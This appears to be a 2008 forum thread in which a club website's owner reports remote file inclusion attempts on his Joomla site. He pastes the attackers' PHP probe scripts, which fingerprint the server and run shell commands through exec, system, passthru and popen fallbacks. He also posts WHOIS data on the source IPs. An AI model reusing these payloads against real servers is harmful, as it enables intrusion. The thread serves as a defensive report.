Bloody Hackers

The place to discuss the Register itself
Post Reply
User avatar
Alan
Site Owner
Posts: 1788
Joined: Sun Mar 30, 2008 6:30 pm
Location: Shropshire, UK.
Contact:

Bloody Hackers

Post by Alan » Sat Apr 05, 2008 11:14 pm

Would you believe there has been a hack attempt made to the site already. The user has been deleted and all posts removed. If anyone is getting strange emails etc let me know ASAP.

Alan.

User avatar
Alan
Site Owner
Posts: 1788
Joined: Sun Mar 30, 2008 6:30 pm
Location: Shropshire, UK.
Contact:

Re: Bloody Hackers

Post by Alan » Tue Apr 08, 2008 2:52 am

Hacker Number One, a Romanian using IP 193.200.252.43 Trying the script that refers the exact path to 'mos_config' which is the config file for Joomla based websites.
HACK -

http://mahindra-register.org/index.php? ... md-asc.txt???

SCRIPT -

<?
echo "/Mic22/<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "/Mic22/<br>";
exit;
?>
Whois data -

% Information related to '193.200.252.0 - 193.200.252.255'

inetnum: 193.200.252.0 - 193.200.252.255
netname: EXPERT-COMPUTER-TRADING
descr: Expert Computer Trading S.R.L.
descr: 220110 8th Chisinau Street
descr: Drobeta Turnu-Severin, Mehedinti
country: RO
org: ORG-ECTS1-RIPE
admin-c: CA2978-RIPE
tech-c: CA2978-RIPE
status: ASSIGNED PI "status:" definitions
mnt-by: AS3233-MNT
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-routes: EXPERT-HOSTING-MNT
mnt-domains: EXPERT-HOSTING-MNT
remarks: object maintained by ROTLD local registry
source: RIPE # Filtered

organisation: ORG-ECTS1-RIPE
org-name: Expert Computer Trading S.R.L.
org-type: OTHER
address: 220110 8th Chisinau Street
address: RO
phone: +40 252 310044
e-mail: admin@expert.ro
admin-c: CA2978-RIPE
tech-c: CA2978-RIPE
mnt-by: AS3233-MNT
mnt-ref: AS3233-MNT
source: RIPE # Filtered

person: Constantin Andrita
address: 8th Chisinau Street
address: Drobeta Turnu-Severin
address: RO
phone: +40 252 310044
fax-no: +40 252 310044
e-mail: admin@expert.ro
nic-hdl: CA2978-RIPE
mnt-by: AS3233-MNT
source: RIPE # Filtered

User avatar
Alan
Site Owner
Posts: 1788
Joined: Sun Mar 30, 2008 6:30 pm
Location: Shropshire, UK.
Contact:

Re: Bloody Hackers

Post by Alan » Tue Apr 08, 2008 3:07 am

Hacker number 2 using a similar attack to number one. This idiot is in Germany on IP 62.75.214.214
HACK -
http://mahindra-register.org/index.php? ... an/id2.txt??

SCRIPT -
<?php
echo "jimmywho";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
% Information related to '62.75.214.0 - 62.75.214.255'

inetnum: 62.75.214.0 - 62.75.214.255
netname: SERVER4YOU-1
descr: SERVER4YOU Dedicated Server Hosting
descr: http://www.server4you.de
country: DE
org: ORG-BSBS1-RIPE
admin-c: IT1309-RIPE
tech-c: IT1309-RIPE
rev-srv: ptr1.intergenia.de
rev-srv: ptr2.intergenia.de
status: ASSIGNED PA "status:" definitions
remarks: Abuse-Contact: abuse@server4you.de
mnt-by: INTERGENIA-MNT
source: RIPE # Filtered

organisation: ORG-BSBS1-RIPE
org-name: B S B - Service GmbH
org-type: OTHER
descr: Internet-Hoster
remarks: BSB Service GmbH is part of intergenia AG
address: Daimlerstr.9-11
address: 50354 Huerth
address: Germany
phone: +49 2233 612-0
fax-no: +49 2233 612-144
admin-c: IT1309-RIPE
tech-c: IT1309-RIPE
mnt-ref: INTERGENIA-MNT
mnt-by: INTERGENIA-MNT
source: RIPE # Filtered

role: Intergenia Technik
address: intergenia AG
address: Daimlerstr. 9-11
address: 50354 Huerth
phone: +49 2233 612 0
fax-no: +49 2233 612 144
remarks: trouble: Information Contact info@plusserver.de
remarks: trouble: Abuse Contact abuse@plusserver.de
remarks: trouble: for more information http://www.plusserver.de
admin-c: JO630-RIPE
admin-c: SW8783-RIPE
admin-c: TSU2-RIPE
tech-c: JO630-RIPE
tech-c: SW8783-RIPE
tech-c: TSU2-RIPE
nic-hdl: IT1309-RIPE
mnt-by: INTERGENIA-MNT
source: RIPE # Filtered
abuse-mailbox: abuse@plusserver.de

% Information related to '62.75.128.0/17AS8972'

route: 62.75.128.0/17
descr: intergenia AG
origin: AS8972
mnt-by: INTERGENIA-MNT
mnt-lower: INTERGENIA-MNT
source: RIPE # Filtered

% Information related to '62.75.214.0/23AS8972'

route: 62.75.214.0/23
descr: intergenia AG
origin: AS8972
mnt-by: INTERGENIA-MNT
mnt-lower: INTERGENIA-MNT
source: RIPE # Filtered

User avatar
Alan
Site Owner
Posts: 1788
Joined: Sun Mar 30, 2008 6:30 pm
Location: Shropshire, UK.
Contact:

Re: Bloody Hackers

Post by Alan » Tue Apr 08, 2008 3:15 am

And finally for today a Russian moron on IP 193.200.252.43 using the same script as moron 1

User avatar
Alan
Site Owner
Posts: 1788
Joined: Sun Mar 30, 2008 6:30 pm
Location: Shropshire, UK.
Contact:

Re: Bloody Hackers

Post by Alan » Tue Apr 08, 2008 3:17 am

PS

If you ' l33t script kiddies ' can read this post then you know what's coming. :club:

User avatar
kev
Technical Expert
Posts: 1239
Joined: Tue Apr 01, 2008 8:58 pm
Location: west mids

Re: Bloody Hackers

Post by kev » Tue Apr 08, 2008 9:45 pm

i am glad you have caught these low life in the game :lol:

Post Reply